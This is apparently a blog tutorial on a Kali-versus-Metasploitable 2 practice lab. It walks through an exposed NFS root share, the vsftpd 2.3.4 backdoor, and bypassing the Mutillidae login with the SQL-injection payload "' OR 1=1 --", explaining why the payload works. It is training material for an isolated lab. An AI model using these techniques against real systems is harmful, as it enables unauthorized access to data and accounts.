In our previous article on How To install Metasploitable we covered the creation and configuration of a Penetration Testing Lab. This setup included an ‘attacker’ using Kali Linux and a ‘target’ using the Linux-based Metasploitable. Both operating systems were a Virtual Machine (VM) running under VirtualBox.
Using this environment we will demonstrate a selection of exploits using a variety of tools from within Kali Linux against Metasploitable V2. For further details beyond what is covered within this article, please check out the Metasploitable 2 Exploitability Guide.
Pentesting Lab
Here is a brief outline of the environment being used:
- VirtualBox: version 6.1
- Kali Linux:
- VM version = Kali Linux 2020.4, AMD64
- Kernel release = 5.9.0-kali1-amd64
- IP address = 10.0.2.15
- Login = kali/kali
- Metasploitable:
- VM version = Metasploitable 2, Ubuntu 64-bit
- Kernel release = 2.6.24-16-server
- IP address = 10.0.2.4
- Login = msfadmin/msfadmin
NFS Service vulnerability
First we need to list what services are visible on the target:
This shows that NFS (Network File System) uses port 2049 so next let’s determine what shares are being exported:
The ‘showmount’ command tells us that the root ‘/’ of the file system is being shared. Next we can mount the Metasploitable file system so that it is accessible from within Kali:
This is an example of a configuration problem that allows a lot of valuable information to be disclosed to potential attackers.
FTP Server backdoor
The vulnerability being demonstrated here is how a backdoor was incorporated into the source code of a commonly used package, namely ‘vsftp’. The FTP server has since been fixed but here is how the affected version could be exploited:
In the previous section we identified that the FTP service was running on port 21, so let’s try to access it via ‘telnet’:
This vulnerability can also be exploited using the Metasploit framework using the VSFTPD v2.3.4 Backdoor Command Execution.
Web Application vulnerabilities
There are a number of intentionally vulnerable web applications included with Metasploitable. Here we examine Mutillidae which contains the OWASP Top Ten and more vulnerabilities.
Mutillidae has the following features:
- Setting the Security Level from 0 (completely insecure) through to 5 (secure).
- Setting 3 levels of hints from 0 (no hints) to 3 (maximum hints).
- A ‘Reset DB’ button in case the application gets damaged during attacks and the database needs reinitializing.
Understanding Mutillidae
Let’s begin by pulling up the Mutillidae homepage:
Notice that the Security Level is set to 0, Hints is also set to 0, and that the user is not Logged In. These are the default statuses which can be changed via the Toggle Security and Toggle Hints buttons.
Information about each OWASP vulnerability can be found under the menu on the left:
Attempting an exploit
For our first example we have Toggled Hints to ‘1’ and selected the ‘A1- Injection -> SQLi – Bypass Authentication -> Login’ vulnerability:
Trying the SSL Injection method of entering “‘ OR 1=1 — ” into the Name field, as described in the hints, gave the following errors:
Warning: Cannot modify header information - headers already sent by (output started at /var/www/mutillidae/process-login-attempt.php:97) in /var/www/mutillidae/index.php on line 148
Warning: Cannot modify header information - headers already sent by (output started at /var/www/mutillidae/process-login-attempt.php:97) in /var/www/mutillidae/index.php on line 254
Warning: Cannot modify header information - headers already sent by (output started at /var/www/mutillidae/process-login-attempt.php:97) in /var/www/mutillidae/index.php on line 255
Warning: Cannot modify header information - headers already sent by (output started at /var/www/mutillidae/process-login-attempt.php:97) in /var/www/mutillidae/index.php on line 256
This turns out to be due to a minor, yet crucial, configuration problem that impacts any database related functionality.
Fixing Mutillidae
Here is the resolution to this problem:
- Within Metasploitable edit the following file via command:
- sudo vi /var/www/mutillidae/config.inc
or - sudo nano /var/www/mutillidae/config.inc
- sudo vi /var/www/mutillidae/config.inc
- Next change the following line then save the file:
- $dbname = ‘metasploit’
to - $dbname = ‘owasp10’
- $dbname = ‘metasploit’
- In Kali Linux bring up the Mutillidae web application in the browser as before and click the ‘Reset DB’ button to re-initialize the database.
- Restart the web server via the following command:
- sudo /etc/init.d/apache2 restart
Back on the Login page try entering the following SQL Injection code with a trailing space into the Name field:
- ‘ OR 1=1 —
The Login should now work successfully without having to input a password! This is Bypassing Authentication via SQL Injection. Effectively what happens is that the Name validation is made to always be true by closing off the field with a single quote and using the OR operator. The two dashes then comment out the remaining Password validation within the executed SQL statement.
Mutillidae has numerous different types of web application vulnerabilities to discover and with varying levels of difficulty to learn from and challenge budding Pentesters.
Note: Metasploitable comes with an early version of Mutillidae (v2.1.19) and reflects a rather out dated OWASP Top 10. For a more up-to-date version visit:
This version will not install on Metasploitable due to out-of-date packages so best to load it onto a Linux VM such as Kali or Ubuntu.
Have you used Metasploitable to practice Penetration Testing? Do you have any feedback on the above examples? If so please share your comments below.